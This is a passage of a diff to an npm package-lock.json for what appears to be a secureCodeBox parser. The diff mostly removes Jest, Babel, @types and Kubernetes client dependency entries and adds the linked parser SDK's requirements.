"jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/reporters/node_modules/istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/@jest/reporters/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "dev": true, - "dependencies": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "optionalDependencies": { - "openid-client": "^5.3.0" - } - }, - "node_modules/@kubernetes/client-node/node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", - "dev": true - }, - "node_modules/@kubernetes/client-node/node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dev": true, - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" + "jsonpointer": "^5.0.1" } }, "node_modules/@securecodebox/parser-sdk-nodejs": { "resolved": "../parser-sdk/nodejs", "link": true - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" + } + }, + "dependencies": { + "@securecodebox/parser-sdk-nodejs": { + "version": "file:../parser-sdk/nodejs", + "requires": { + "@kubernetes/client-node": "^1.3.0", + "ajv": "^8.17.1", + "ajv-draft-04": "^1.0.0", + "ajv-formats": "^3.0.1", + "jsonpointer": "^5.0.1" } - }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==", - "dev": true - }, - "node_modules/@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", - "dev": true, - "dependencies": { - "undici-types": "~6.19.2" - } - }, - "node_modules/@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "dev": true, - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "node_modules/@types/request/node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dev": true, - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==", - "dev": true - }, - "node_modules/@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dev": true, - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "dev": true, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", - "dev": true - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==", - "dev": true - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dev": true, - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", 